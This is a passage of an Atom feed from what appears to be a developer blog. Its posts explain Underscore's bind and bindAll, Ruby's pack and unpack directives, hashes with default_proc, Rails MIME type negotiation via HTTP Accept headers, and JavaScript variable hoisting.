  this.says = function () {
    alert(this.skill + &quot; rocks!&quot;);
  };
}

var john = new Developer(&quot;Ruby&quot;);
var func = _.bind(john.says, john);
func(); // Ruby rocks!</code></pre><p>To solve the problem regarding <code>this</code> we need a function that is already mapped to <code>john</code>, so that we do not need to keep carrying <code>john</code> around. That's precisely what <code>bind</code> does. It returns a new function, and this new function has <code>this</code> bound to the value that we provide.</p><p>Here is a snippet of code from the <code>bind</code> method.</p><pre><code class="language-javascript">return function () {
  return func.apply(obj, args.concat(slice.call(arguments)));
};</code></pre><p>As you can see, <code>bind</code> internally uses <code>apply</code> to set <code>this</code> to the second parameter we passed while invoking <code>bind</code>.</p><p>Notice that <code>bind</code> does not change the existing function. It returns a new function, and that new function should be used.</p><h2>How bindAll solves the problem</h2><p>Instead of <code>bind</code> we can also use <code>bindAll</code>. Here is the solution with <code>bindAll</code>.</p><pre><code class="language-javascript">function Developer(skill) {
  this.skill = skill;
  this.says = function () {
    alert(this.skill + &quot; rocks!&quot;);
  };
}

var john = new Developer(&quot;Ruby&quot;);
_.bindAll(john, &quot;says&quot;);
var func = john.says;
func(); // Ruby rocks!</code></pre><p>The above code is similar to the <code>bind</code> solution but there are some big differences.</p><p>The first big difference is that we do not have to worry about the returned value of <code>bindAll</code>. In the case of <code>bind</code> we must use the returned function. 
With <code>bindAll</code> we do not have to worry about the returned value, but that comes with a price: <code>bindAll</code> actually mutates the object. What does that mean?</p><p>The <code>john</code> object has an attribute called <code>says</code> which holds a function. <code>bindAll</code> goes and changes the attribute <code>says</code> so that the function it holds is already bound to <code>john</code>.</p><p>Here is a snippet of code from the <code>bindAll</code> method.</p><pre><code class="language-javascript">function(f) { obj[f] = _.bind(obj[f], obj); }</code></pre><p>Notice that <code>bindAll</code> internally calls <code>bind</code> and overrides the existing attribute with the function returned by <code>bind</code>.</p><p>The other difference between <code>bind</code> and <code>bindAll</code> is that in <code>bind</code> the first parameter is a function, <code>john.says</code>, and the second parameter is the value of this, <code>john</code>. In <code>bindAll</code> the first parameter is the value of this, <code>john</code>, and the second parameter is not a function but the attribute name.</p><h2>Things to watch out for</h2><p>While developing a Backbone.js application someone had code like this.</p><pre><code class="language-javascript">window.ProductView = Backbone.View.extend({
  initialize: function () {
    _.bind(this.render, this);
    this.model.bind(&quot;change&quot;, this.render);
  },
});</code></pre><p>The above code will not work because the returned value of <code>bind</code> is not being used. The correct usage would be</p><pre><code class="language-javascript">window.ProductView = Backbone.View.extend({
  initialize: function () {
    this.model.bind(&quot;change&quot;, _.bind(this.render, this));
  },
});</code></pre><p>Or you can use <code>bindAll</code> as given below. Note that <code>bindAll</code> takes the method <em>name</em> as a string, not the function itself.</p><pre><code class="language-javascript">window.ProductView = Backbone.View.extend({
  initialize: function () {
    _.bindAll(this, &quot;render&quot;);
    
this.model.bind(&quot;change&quot;, this.render);
  },
});</code></pre><h2>Recommended videos</h2><p>If you like this blog then most likely you will also like our video series &quot;Understanding this in JavaScript&quot; at <a href="https://www.bigbinary.com/videos/learn-javascript">Learn JavaScript</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby pack unpack]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-pack-unpack"/>
      <updated>2011-07-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-pack-unpack</id>
      <content type="html"><![CDATA[<p>The C programming language allows developers to directly access the memory where variables are stored. Ruby does not allow that. There are times while working in Ruby when you need to access the underlying bits and bytes. Ruby provides two methods, <code>pack</code> and <code>unpack</code>, for that.</p><p>Here is an example.</p><pre><code class="language-ruby">&gt; 'A'.unpack('b*')
=&gt; [&quot;10000010&quot;]</code></pre><p>In the above case 'A' is a string which is being stored, and using <code>unpack</code> I am trying to read the bit value. The <a href="http://www.asciitable.com">ASCII table</a> says that the ASCII value of 'A' is 65. The binary representation of 65 is <code>01000001</code>; the directive <code>b*</code> lists those bits least significant bit first, which is why we see <code>10000010</code>.</p><p>Here is another example.</p><pre><code class="language-ruby">&gt; 'A'.unpack('B*')
=&gt; [&quot;01000001&quot;]</code></pre><p>Notice the difference in result from the first case. What's the difference between <code>b*</code> and <code>B*</code>? In order to understand the difference, first let's discuss MSB and LSB.</p><h2>Most significant bit vs Least significant bit</h2><p>All bits are not created equal. <code>C</code> has the ASCII value 67. The binary value of 67 is <code>1000011</code>.</p><p>First let's discuss the MSB (most significant bit) style. If you are following the MSB style, then going from left to right (and you always go from left to right) the most significant bit comes first. Because the most significant bit comes first, we can pad an additional zero to the left to make the number of bits eight. After adding an additional zero to the left, the binary value looks like <code>01000011</code>.</p><p>If we want to convert this value to the LSB (least significant bit) style then we need to store the least significant bit first, going from left to right. Given below is how the bits will be moved if we are converting from MSB to LSB. 
Note that in the below case position 1 refers to the leftmost bit.</p><pre><code>move value 1 from position 8 of MSB to position 1 of LSB
move value 1 from position 7 of MSB to position 2 of LSB
move value 0 from position 6 of MSB to position 3 of LSB
and so on and so forth</code></pre><p>After the exercise is over the value will look like <code>11000010</code>.</p><p>We did this exercise manually to understand the difference between the <code>most significant bit</code> and the <code>least significant bit</code>. However the unpack method can directly give the result in both MSB and LSB styles. The <code>unpack</code> method can take both <code>b*</code> and <code>B*</code> as input. As per the Ruby documentation, here is the difference.</p><pre><code>B | bit string (MSB first)
b | bit string (LSB first)</code></pre><p>Now let's take a look at two examples.</p><pre><code class="language-ruby">&gt; 'C'.unpack('b*')
=&gt; [&quot;11000010&quot;]
&gt; 'C'.unpack('B*')
=&gt; [&quot;01000011&quot;]</code></pre><p>Both <code>b*</code> and <code>B*</code> are looking at the same underlying data. It's just that they represent the data differently.</p><h2>Different ways of getting the same data</h2><p>Let's say that I want the binary value for the string <code>hello</code>. 
Based on the discussion in the last section that should be easy now.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('B*')
=&gt; [&quot;0110100001100101011011000110110001101111&quot;]</code></pre><p>The same information can also be derived as</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C*').map { |e| e.to_s 2 }
=&gt; [&quot;1101000&quot;, &quot;1100101&quot;, &quot;1101100&quot;, &quot;1101100&quot;, &quot;1101111&quot;]</code></pre><p>Let's break down the previous statement into small steps.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C*')
=&gt; [104, 101, 108, 108, 111]</code></pre><p>The directive <code>C*</code> gives the <code>8-bit unsigned integer</code> value of each character. Note that the ASCII value of <code>h</code> is <code>104</code>, the ASCII value of <code>e</code> is <code>101</code>, and so on.</p><p>Using the technique discussed above I can find the hex value of the string.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C*').map { |e| e.to_s 16 }
=&gt; [&quot;68&quot;, &quot;65&quot;, &quot;6c&quot;, &quot;6c&quot;, &quot;6f&quot;]</code></pre><p>The hex value can also be obtained directly.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('H*')
=&gt; [&quot;68656c6c6f&quot;]</code></pre><h2>High nibble first vs Low nibble first</h2><p>Notice the difference in the below two cases.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('H*')
=&gt; [&quot;68656c6c6f&quot;]
&gt; &quot;hello&quot;.unpack('h*')
=&gt; [&quot;8656c6c6f6&quot;]</code></pre><p>As per the Ruby documentation for unpack</p><pre><code>H | hex string (high nibble first)
h | hex string (low nibble first)</code></pre><p>A byte consists of 8 bits. A nibble consists of 4 bits. So a byte has two nibbles. The ASCII value of 'h' is <code>104</code>. The hex value of 104 is <code>68</code>. This <code>68</code> is stored in two nibbles. 
The first nibble, meaning 4 bits, contains the value <code>6</code>, and the second nibble contains the value <code>8</code>. In general we deal with high nibble first, so going from left to right we pick the value <code>6</code> and then <code>8</code>.</p><p>However, if you are dealing with low nibble first, then the low nibble value <code>8</code> takes the first slot and then <code>6</code> comes. Hence the result in &quot;low nibble first&quot; mode will be <code>86</code>.</p><p>This pattern is repeated for each byte. And because of that, the hex value <code>68 65 6c 6c 6f</code> looks like <code>86 56 c6 c6 f6</code> in low nibble first format.</p><h2>Mix and match directives</h2><p>In all the previous examples I used <code>*</code>. A <code>*</code> means to keep going as long as there is data left. Let's see a few examples.</p><p>A single <code>C</code> will get a single byte.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C')
=&gt; [104]</code></pre><p>You can add more <code>C</code>s if you like.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('CC')
=&gt; [104, 101]
&gt; &quot;hello&quot;.unpack('CCC')
=&gt; [104, 101, 108]
&gt; &quot;hello&quot;.unpack('CCCCC')
=&gt; [104, 101, 108, 108, 111]</code></pre><p>Rather than repeating all those directives, I can put a number to denote how many times the previous directive should be repeated.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C5')
=&gt; [104, 101, 108, 108, 111]</code></pre><p>I can use <code>*</code> to capture all the remaining bytes.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C*')
=&gt; [104, 101, 108, 108, 111]</code></pre><p>Below is an example where <code>MSB</code> and <code>LSB</code> are being mixed.</p><pre><code class="language-ruby">&gt; &quot;aa&quot;.unpack('b8B8')
=&gt; [&quot;10000110&quot;, &quot;01100001&quot;]</code></pre><h3>pack is the reverse of unpack</h3><p>The method <code>pack</code> is the reverse of <code>unpack</code>: rather than reading values out of a string, it packs values into string 
data. Let's discuss a few examples.</p><pre><code class="language-ruby">&gt; [65].pack('C')
=&gt; &quot;A&quot;</code></pre><p>In the above case the value 65 is interpreted as an <code>8-bit unsigned integer</code>, and the character whose ASCII value is 65 is 'A'. (Writing the binary literal explicitly, <code>[0b1000001].pack('C')</code> gives the same result.)</p><pre><code class="language-ruby">&gt; ['A'].pack('H')
=&gt; &quot;\xA0&quot;</code></pre><p>In the above case the input 'A' is not an ASCII 'A' but the hex 'A'. Why is it hex 'A'? It is hex 'A' because the directive 'H' tells pack to treat the input value as a hex value. Since 'H' is high nibble first, and since the input has only one nibble, the second nibble is zero. So the input changes from <code>['A']</code> to <code>['A0']</code>.</p><p>Since the hex value <code>A0</code> does not translate into anything printable in the ASCII table, the final output is left as is, and hence the result is <code>\xA0</code>. The leading <code>\x</code> indicates that the value is a hex value.</p><p>Notice that in hex notation <code>A</code> is the same as <code>a</code>. So in the above example I can replace <code>A</code> with <code>a</code> and the result should not change. Let's try that.</p><pre><code class="language-ruby">&gt; ['a'].pack('H')
=&gt; &quot;\xA0&quot;</code></pre><p>Let's discuss another example.</p><pre><code class="language-ruby">&gt; ['a'].pack('h')
=&gt; &quot;\n&quot;</code></pre><p>In the above example notice the change: I changed the directive from <code>H</code> to <code>h</code>. Since <code>h</code> means low nibble first, and since the input has only one nibble, the input value is treated as the low nibble and the high nibble becomes zero. That means the value changes from <code>['a']</code> to <code>['0a']</code>, and the output will be <code>\x0A</code>. If you look at the ASCII table, the hex value <code>A</code> is ASCII value 10, which is <code>NL line feed, new line</code>. 
Hence we see <code>\n</code> as the output, because ASCII 10 is the newline character.</p><h2>Usage of unpack in Rails source code</h2><p>I did a quick grep in the Rails source code and found the following usages of unpack.</p><pre><code>email_address_obfuscated.unpack('C*')
'mailto:'.unpack('C*')
email_address.unpack('C*')
char.unpack('H2')
column.class.string_to_binary(value).unpack(&quot;H*&quot;)
data.unpack(&quot;m&quot;)
s.unpack(&quot;U*&quot;)</code></pre><p>We have already seen the usage of the directives <code>C*</code> and <code>H</code> for unpack. The directive <code>m</code> decodes a base64 encoded string, and the directive <code>U*</code> gives the UTF-8 codepoints. Here is an example.</p><pre><code class="language-ruby">&gt; &quot;Hello&quot;.unpack('U*')
=&gt; [72, 101, 108, 108, 111]</code></pre><h2>Testing environment</h2><p>The above code was tested with ruby 1.9.2.</p><p>A French version of this article is available <a href="http://vfsvp.fr/article/les-methodes-pack-et-unpack-en-ruby/">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Infinite hash and default_proc]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/default_proc_in_infinite_hash"/>
      <updated>2010-12-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/default_proc_in_infinite_hash</id>
      <content type="html"><![CDATA[<p>If you already know how <a href="http://twitter.com/#!/tenderlove/status/5687291469107200">this infinite hash</a> works then you are all set. If not, read along.</p><h2>Default value of Hash</h2><p>If I want a hash to have a default value then that's easy.</p><pre><code class="language-ruby">h = Hash.new(0)
puts h['usa'] #=&gt; 0</code></pre><p>The above code will give me a fixed value if a key is not found. If I want a dynamic value then I can use the block form.</p><pre><code class="language-ruby">h = Hash.new { |h, k| h[k] = k.upcase }
puts h['usa']   #=&gt; USA
puts h['india'] #=&gt; INDIA</code></pre><h2>Default value is hash</h2><p>If I want the default value to be a <code>hash</code> then it seems easy, but it falls apart soon.</p><pre><code class="language-ruby">h = Hash.new { |h, k| h[k] = {} }
puts h['usa'].inspect #=&gt; {}
puts h['usa']['ny'].inspect #=&gt; nil
puts h['usa']['ny']['nyc'].inspect #=&gt; NoMethodError: undefined method `[]' for nil:NilClass</code></pre><p>In the above, if a key is missing from <code>h</code> then it returns a hash. However the returned hash is an ordinary hash which does not have the capability of returning another hash when a key is missing.</p><p>This is where <code>default_proc</code> comes into the picture. <a href="http://ruby-doc.org/core-1.8.6/classes/Hash.html#M002854">hash.default_proc</a> returns the block which was passed to <code>Hash.new</code>.</p><pre><code class="language-ruby">h = Hash.new { |h, k| Hash.new(&amp;h.default_proc) }
puts h['usa']['ny']['nyc'].inspect #=&gt; {}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Mime type resolution in Rails]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/mime-type-resolution-in-rails"/>
      <updated>2010-11-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/mime-type-resolution-in-rails</id>
      <content type="html"><![CDATA[<p>This is a long blog. If you want a summary then José Valim has provided a <a href="http://twitter.com/#!/josevalim/status/7928782685995009">summary in less than 140 characters</a>.</p><p>It is common to see the following code in Rails.</p><pre><code class="language-ruby">respond_to do |format|
  format.html
  format.xml  { render :xml =&gt; @users }
end</code></pre><p>If you want output in xml format then request with the <code>.xml</code> extension at the end, like this: <code>localhost:3000/users.xml</code>, and you will get the output in xml format.</p><p>What we saw is only one part of the puzzle. The other side of the equation is the HTTP header field <a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.1">Accept</a> defined in the HTTP RFC.</p><h2>HTTP Header Field Accept</h2><p>When a browser sends a request, it also sends information about what kind of resources the browser is capable of handling. Here are some examples of the <em>Accept</em> header a browser can send.</p><pre><code class="language-plaintext">text/plain
image/gif, image/x-xbitmap, image/jpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
application/vnd.wap.wmlscriptc, text/vnd.wap.wml, application/vnd.wap.xhtml+xml, application/xhtml+xml, text/html, multipart/mixed, */*</code></pre><p>If you are reading this blog in a browser then you can find out what kind of <em>Accept</em> header your browser is sending by visiting <a href="http://pgl.yoyo.org/http/browser-headers.php">this link</a>. 
Here is a list of <em>Accept</em> headers sent by different browsers on my machine.</p><pre><code class="language-plaintext">Chrome: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Firefox: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,application/json
Safari: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
IE: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*</code></pre><p>Let's take a look at the <em>Accept</em> header sent by Safari.</p><pre><code class="language-plaintext">Safari: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5</code></pre><p>Safari is saying: I can handle documents which are xml (application/xml), html (text/html) or plain text (text/plain). I can also handle images such as image/png. If all else fails then send me whatever you can and I will try to render that document to the best of my ability.</p><p>Notice that there are also <strong>q</strong> values. They signify the priority order. This is what the HTTP spec has to say about <strong>q</strong>.</p><blockquote><p>Each media-range MAY be followed by one or more accept-params, beginning with the &quot;q&quot; parameter for indicating a relative quality factor. The first &quot;q&quot; parameter (if any) separates the media-range parameter(s) from the accept-params. Quality factors allow the user or user agent to indicate the relative degree of preference for that media-range, using the qvalue scale from 0 to 1 (section 3.9). The default value is q=1.</p></blockquote><p>The spec is saying that each document type has a default <em>q</em> value of 1. When a <em>q</em> value is specified, take that value into account. For all documents that have the same <em>q</em> value, give higher priority to the one that came first in the list. 
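</p><p>The q rule above is mechanical enough to sketch in a few lines of Ruby. This is a simplified, illustrative parser of my own, not the one Rails actually uses.</p>

```ruby
# Order media types by the Accept header's q rule: default q is 1.0,
# higher q wins, and ties keep their original position in the header.
def accept_order(header)
  header.split(",").map.with_index do |part, index|
    type, *params = part.strip.split(";").map(&:strip)
    q = params.grep(/\Aq=/).map { |p| p.sub("q=", "").to_f }.first || 1.0
    [type, q, index]
  end.sort_by { |_type, q, index| [-q, index] }.map(&:first)
end

safari = "application/xml,application/xhtml+xml,text/html;q=0.9," \
         "text/plain;q=0.8,image/png,*/*;q=0.5"

p accept_order(safari)
# => ["application/xml", "application/xhtml+xml", "image/png",
#     "text/html", "text/plain", "*/*"]
```

<p>Running this on Safari's header reproduces the ordering below. 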
Based on that, this should be the order in which documents should be sent to the Safari browser.</p><pre><code class="language-plaintext">application/xml (q is 1)
application/xhtml+xml (q is 1)
image/png (q is 1)
text/html (q is 0.9)
text/plain (q is 0.8)
*/* (q is 0.5)</code></pre><p>Notice that Safari is nice enough to put a lower priority on */*. Chrome and Firefox also put */* at a lower priority, which is a good thing. Not so with IE, which does not declare any q value for */*.</p><p>Look at the order again and you can see that <em>application/xml</em> has higher priority than <em>text/html</em>. What it means is that Safari is telling Rails: I would prefer <em>application/xml</em> over <em>text/html</em>. Send me <em>text/html</em> only if you cannot send <em>application/xml</em>.</p><p>Now let's say that you have developed a RESTful app which is capable of sending output in both html and xml formats.</p><p>Rails, being a good HTTP citizen, should follow the HTTP_ACCEPT protocol and should send an xml document in this case. Again, all you did was visit a website and Safari is telling Rails to send an xml document over an html document. Clearly the HTTP_ACCEPT values being sent by Safari are broken.</p><h2>HTTP_ACCEPT is broken</h2><p>The HTTP_ACCEPT attribute concept is neat. It defines the order and the priority. However the implementation is broken by all the browser vendors. Given that browsers do not send a proper HTTP_ACCEPT, what can Rails do? One solution is to ignore it completely. If you want <em>xml</em> output then request <em>http://localhost:3000/users.xml</em>. Solely relying on formats makes life easy and less buggy. This is what Rails did for a long time.</p><p>Starting with <a href="https://github.com/rails/rails/commit/2f4aaed7b3feb3be787a316fab3144c06bb21a27">this commit</a>, by default, Rails ignored the HTTP_ACCEPT attribute.
The same is true for the <a href="https://developer.twitter.com/en/docs">Twitter API</a>, where the HTTP_ACCEPT attribute is ignored and Twitter solely relies on the format to find out what kind of document should be returned.</p><p>Unfortunately this solution has its own set of problems. The web has been around for a long time and there are a lot of applications which expect the response to be an RSS feed if they are sending <em>application/rss+xml</em> in their HTTP_ACCEPT attribute. It is not nice to take a hard stand and ask all of them to request with the extension <em>.rss</em>.</p><h3>Parsing HTTP_ACCEPT attribute</h3><p>Parsing and obeying the HTTP_ACCEPT attribute is filled with many edge cases. First let's look at the code that decides what to parse and how to handle the data.</p><pre><code class="language-ruby">BROWSER_LIKE_ACCEPTS = /,\s*\*\/\*|\*\/\*\s*,/

def formats
  accept = @env['HTTP_ACCEPT']
  @env[&quot;action_dispatch.request.formats&quot;] ||=
    if parameters[:format]
      Array(Mime[parameters[:format]])
    elsif xhr? || (accept &amp;&amp; accept !~ BROWSER_LIKE_ACCEPTS)
      accepts
    else
      [Mime::HTML]
    end
end</code></pre><p>Notice that if a format is passed, like <em>http://localhost:3000/users.xml</em> or <em>http://localhost:3000/users.js</em>, then Rails does not even parse the HTTP_ACCEPT values. Also note that if the browser is sending */* along with other values then Rails totally bails out and just returns Mime::HTML unless the request is an ajax request.</p><p>Next I am going to discuss some of the cases in greater detail, which should bring more clarity around this issue.</p><h2>Case 1: HTTP_ACCEPT is */*</h2><p>I have the following code.</p><pre><code class="language-ruby">respond_to do |format|
  format.html { render :text =&gt; 'this is html' }
  format.js  { render :text =&gt; 'this is js' }
end</code></pre><p>I am assuming that the <em>HTTP_ACCEPT</em> value is */*. In this case the browser is saying: send me whatever you have got.
Since the browser is not dictating the order in which documents should be sent, Rails will look at the order in which Mime types are declared in the respond_to block and will pick the first one. Here is the corresponding code.</p><pre><code class="language-ruby">def negotiate_mime(order)
  formats.each do |priority|
    if priority == Mime::ALL
      return order.first
    elsif order.include?(priority)
      return priority
    end
  end
  order.include?(Mime::ALL) ? formats.first : nil
end</code></pre><p>What it's saying is that if Mime::ALL is sent then pick the first one declared in the respond_to block. So be careful with the order in which formats are declared inside the respond_to block.</p><p>The order in which formats are declared can be a real issue. Check out the case (link is not available) where the author ran into an issue because of the order in which formats are declared.</p><p>So far so good. However what if there is no respond_to block? If I don't have a respond_to block and if I have <em>index.html.erb</em>, <em>index.js.erb</em> and <em>index.xml.builder</em> files in my view directory then which one will be picked up? In this case Rails will go over all the registered formats in the order in which they are declared and will try to find a match. So in this case it matters in what order Mime types are registered.
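The negotiate_mime behavior described above can be sketched with plain Ruby stand-ins, using symbols in place of real Mime objects (a simplified illustration of the algorithm, not the Rails internals):

```ruby
# Simplified stand-in for Rails' negotiate_mime: `formats` is what the
# browser accepts (in priority order), `order` is what respond_to declares.
def negotiate_mime(formats, order)
  formats.each do |priority|
    return order.first if priority == :all   # */* => first declared format wins
    return priority if order.include?(priority)
  end
  order.include?(:all) ? formats.first : nil
end

negotiate_mime([:all], [:html, :js])        # browser sent */* -> :html
negotiate_mime([:js, :html], [:html, :js])  # browser prefers js -> :js
```

With */* the declaration order in the respond_to block is the only thing that matters, which is why Case 1 is so order-sensitive.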
Here is the code that registers Mime types.</p><pre><code class="language-ruby">Mime::Type.register &quot;text/html&quot;, :html, %w( application/xhtml+xml ), %w( xhtml )
Mime::Type.register &quot;text/plain&quot;, :text, [], %w(txt)
Mime::Type.register &quot;text/javascript&quot;, :js, %w( application/javascript application/x-javascript )
Mime::Type.register &quot;text/css&quot;, :css
Mime::Type.register &quot;text/calendar&quot;, :ics
Mime::Type.register &quot;text/csv&quot;, :csv
Mime::Type.register &quot;application/xml&quot;, :xml, %w( text/xml application/x-xml )
Mime::Type.register &quot;application/rss+xml&quot;, :rss
Mime::Type.register &quot;application/atom+xml&quot;, :atom
Mime::Type.register &quot;application/x-yaml&quot;, :yaml, %w( text/yaml )
Mime::Type.register &quot;multipart/form-data&quot;, :multipart_form
Mime::Type.register &quot;application/x-www-form-urlencoded&quot;, :url_encoded_form

# http://www.ietf.org/rfc/rfc4627.txt
# http://www.json.org/JSONRequest.html
Mime::Type.register &quot;application/json&quot;, :json, %w( text/x-json application/jsonrequest )

# Create Mime::ALL but do not add it to the SET.
Mime::ALL = Mime::Type.new(&quot;*/*&quot;, :all, [])</code></pre><p>As you can see, <em>text/html</em> is first in the list, <em>text/javascript</em> next and then <em>application/xml</em>.
So Rails will look for a view file in the following order: <em>index.html.erb</em>, <em>index.js.erb</em> and <em>index.xml.builder</em>.</p><h2>Case 2: HTTP_ACCEPT with no */*</h2><p>I am going to assume that in this case the HTTP_ACCEPT sent by the browser looks really simple, like this</p><pre><code class="language-plaintext">text/javascript, text/html, text/plain</code></pre><p>I am also assuming that my respond_to block looks like this</p><pre><code class="language-ruby">respond_to do |format|
  format.html { render :text =&gt; 'this is html' }
  format.js  { render :text =&gt; 'this is js' }
end</code></pre><p>So the browser is saying: I prefer documents in the following order</p><pre><code class="language-plaintext">js
html
plain</code></pre><p>The order in which formats are declared is</p><pre><code class="language-plaintext">html (format.html)
js (format.js)</code></pre><p>In this case Rails will go through each Mime type that the browser supports, from top to bottom, one by one. If a match is found then the response is sent, otherwise Rails tries to find a match for the next Mime type. First in the list of Mime types supported by the browser is js, and Rails does find that my respond_to block supports <em>.js</em>. Rails executes the <em>format.js</em> block and the response is sent to the browser.</p><h2>Case 3: Ajax requests</h2><p>When an AJAX request is made then Safari, Firefox and Chrome send only one item in HTTP_ACCEPT and that is */*. So if you are making an AJAX request then HTTP_ACCEPT for these three browsers will look like</p><pre><code class="language-plaintext">Chrome: */*
Firefox: */*
Safari: */*</code></pre><p>and if your respond_to block looks like this</p><pre><code class="language-ruby">respond_to do |format|
  format.html { render :text =&gt; 'this is html' }
  format.js  { render :text =&gt; 'this is js' }
end</code></pre><p>then the first one will be served based on the formats order. And in this case an html response would be sent for an AJAX request.
This is not what you want.</p><p>This is the reason why, if you are using jQuery and you are sending AJAX requests, you should add something like this in your <em>application.js</em> file</p><pre><code class="language-javascript">$(function () {
  $.ajaxSetup({
    beforeSend: function (xhr) {
      xhr.setRequestHeader(&quot;Accept&quot;, &quot;text/javascript&quot;);
    },
  });
});</code></pre><p>If you are using a newer version of rails.js then you don't need to add the above code, since it is already taken care of for you by <a href="https://github.com/rails/jquery-ujs/commit/b6a3500bfb4b845d2c5e2f81b3c57a62fffd0845">this commit</a>.</p><h2>Trying it out</h2><p>If you want to play with the HTTP_ACCEPT header then put the following line in your controller to inspect the HTTP_ACCEPT attribute.</p><pre><code class="language-ruby">puts request.headers['HTTP_ACCEPT']</code></pre><p>I used the following rake task to set a custom HTTP_ACCEPT attribute.</p><pre><code class="language-ruby">require &quot;net/http&quot;
require &quot;uri&quot;

task :custom_accept do
  uri = URI.parse(&quot;http://localhost:3000/users&quot;)
  http = Net::HTTP.new(uri.host, uri.port)
  request = Net::HTTP::Get.new(uri.request_uri)
  request[&quot;Accept&quot;] = &quot;text/html, application/xml, */*&quot;
  response = http.request(request)
  puts response.body
end</code></pre><h2>Thanks</h2><p>I got familiar with the intricacies of mime parsing while working on <a href="https://rails.lighthouseapp.com/projects/8994-ruby-on-rails/tickets/6022-content-negotiation-fails-for-some-headers-regression#ticket-6022-10">ticket #6022</a>. A big thanks to <a href="http://twitter.com/#!/josevalim">José Valim</a> for patiently dealing with me while working on this ticket.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Variable declaration at the top is not just pretty thing]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/variable-hoisting-is-not-just-pretty-thing"/>
      <updated>2010-11-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/variable-hoisting-is-not-just-pretty-thing</id>
      <content type="html"><![CDATA[<p>I was discussing JavaScript code with a friend and he noticed that I had declared all the variables at the top.</p><p>He likes to declare variables where they are used, to be sure that the variable being used is declared with var; otherwise that variable will become a global variable. This fear of accidentally creating global variables makes him want to see the variable declaration next to where it is being used.</p><h2>Use the right tool</h2><pre><code class="language-javascript">var payment;
payment = soldPrice + shippingCost;</code></pre><p>In the above case the user has declared the payment variable in the middle so that he is sure that payment is declared. However if there is a typo, as given below, then he has accidentally created a global variable.</p><pre><code class="language-javascript">var payment;
paymant = soldPrice + shippingCost; // there is a typo: creates a global</code></pre><p>Having the variable declaration next to where the variable is being used is not a safe way of guaranteeing that the variable is declared. Use the right tool, and that would be <a href="http://www.jslint.com/">jslint</a> validation. I use MacVim and I use <a href="http://www.javascriptlint.com/">Javascript Lint</a>. So every time I save a JavaScript file validation is done and I get a warning if I am accidentally creating a global variable.</p><p>You can configure things such that JSLint validation runs when you check your code into git or when you push to github. Or you can have a custom rake task. Many solutions are available; choose the one that fits you. But do not rely on manual inspection.</p><h2>Variable declarations are being moved to the top by the browser</h2><p>Take a look at the following code. One might expect that console.log will print &quot;Neeraj&quot; but the output will be &quot;undefined&quot;.
That is because, even though you have declared variables next to where they are being used, browsers lift those declarations to the very top.</p><pre><code class="language-javascript">name = &quot;Neeraj&quot;;
function lab() {
  console.log(name);
  var name = &quot;John&quot;;
  console.log(name);
}
lab();</code></pre><p>The browser converts the above code into the one shown below.</p><pre><code class="language-javascript">name = &quot;Neeraj&quot;;
function lab() {
  var name = undefined;
  console.log(name);
  name = &quot;John&quot;;
  console.log(name);
}
lab();</code></pre><p>In order to avoid this kind of mistake it is preferred to declare variables at the top, like this.</p><pre><code class="language-javascript">name = &quot;Neeraj&quot;;
function lab() {
  var name = &quot;John&quot;;
  console.log(name);
  console.log(name);
}
lab();</code></pre><p>Looking at the first set of code a person might think that the first console.log would print &quot;Neeraj&quot;; because of hoisting it prints &quot;undefined&quot; instead.</p><p>Also remember that the scope of a variable in JavaScript is at the function level.</p><h2>Implications on how functions are declared</h2><p>There are two ways of declaring a function.</p><pre><code class="language-javascript">var myfunc = function () {};
function myfunc2() {}</code></pre><p>In the first case only the variable declaration <code>myfunc</code> is getting hoisted up. The definition of myfunc is <em>NOT</em> getting hoisted. In the second case both the variable declaration and the function definition are getting hoisted up. For more information on this refer to my <a href="two-ways-of-declaring-functions">previous blog on the same topic</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[An inline confirmation utility powered by jQuery]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/iconfirm-an-inline-confirmation-jquery-plugin"/>
      <updated>2010-11-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/iconfirm-an-inline-confirmation-jquery-plugin</id>
      <content type="html"><![CDATA[<p>I needed an inline confirmation utility.</p><p>With jQuery it was easy.</p><p>After a few hours I had <code>iconfirm</code>.</p><p>This project is deprecated now.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Return false has changed in jquery 1.4.3]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/return-false-in-jquery-1.4.3"/>
